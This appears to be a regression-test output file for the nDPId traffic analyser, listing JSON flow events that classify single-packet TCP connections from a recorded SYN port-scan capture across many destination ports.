-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2492,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMBv23","breed":"Acceptable","category":"System"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57797,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57797,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4550,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57797,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57797,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4550,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8649,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":458,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1294,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8649,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":458,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8651,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8651,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8652,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8651,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8651,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8652,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8652,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8654,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8654,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8654,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1864,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8654,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":464,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 